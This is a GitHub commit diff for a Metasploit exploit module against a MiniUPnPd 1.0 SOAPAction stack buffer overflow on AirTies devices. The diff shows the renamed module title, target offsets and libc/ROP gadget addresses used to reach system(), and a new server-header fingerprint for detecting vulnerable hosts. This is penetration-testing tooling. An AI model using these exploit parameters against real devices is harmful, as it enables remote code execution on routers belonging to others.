Skip to content

Commit 8db8899

Browse files
author
m-1-k-3
committed
fingerprint, title
1 parent 285d767 commit 8db8899

File tree

1 file changed

+6
-4
lines changed

1 file changed

+6
-4
lines changed

modules/exploits/linux/upnp/airties_miniupnpd_soap_bof.rb

Lines changed: 6 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
1212

1313
def initialize(info = {})
1414
super(update_info(info,
15-
'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
15+
'Name' => 'AirTies MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
1616
'Description' => %q{
1717
This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
1818
present in the SOAPAction HTTP header handling.
@@ -41,8 +41,9 @@ def initialize(info = {})
4141
{
4242
'Offset' => 2048,
4343
'LibcBase' => 0x2aabd000,
44-
'System' => 0x00031AC0 ,
45-
'CallSystem' => 0x0001CC94 # prepare $a0 and jump to $s0
44+
'System' => 0x00031AC0,
45+
'CallSystem' => 0x0001CC94, # prepare $a0 and jump to $s0
46+
'ServerHeader' => "AirTies/ASP 1.0 UPnP/1.0 miniupnpd/1.0" # Fingerprint
4647
}
4748
],
4849
],
@@ -62,7 +63,7 @@ def check
6263
'uri' => "/",
6364
})
6465

65-
if res && res.headers['Server'] =~ /miniupnpd\/1.0/
66+
if res && res.headers['Server'] == target['ServerHeader']
6667
return Exploit::CheckCode::Detected
6768
end
6869
rescue ::Rex::ConnectionError
@@ -74,6 +75,7 @@ def check
7475

7576
def exploit
7677
print_status("#{peer} - Accessing the vulnerable URL...")
78+
print_status(target['ServerHeader'])
7779

7880
unless check == Exploit::CheckCode::Detected
7981
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")

0 commit comments

Comments
 (0)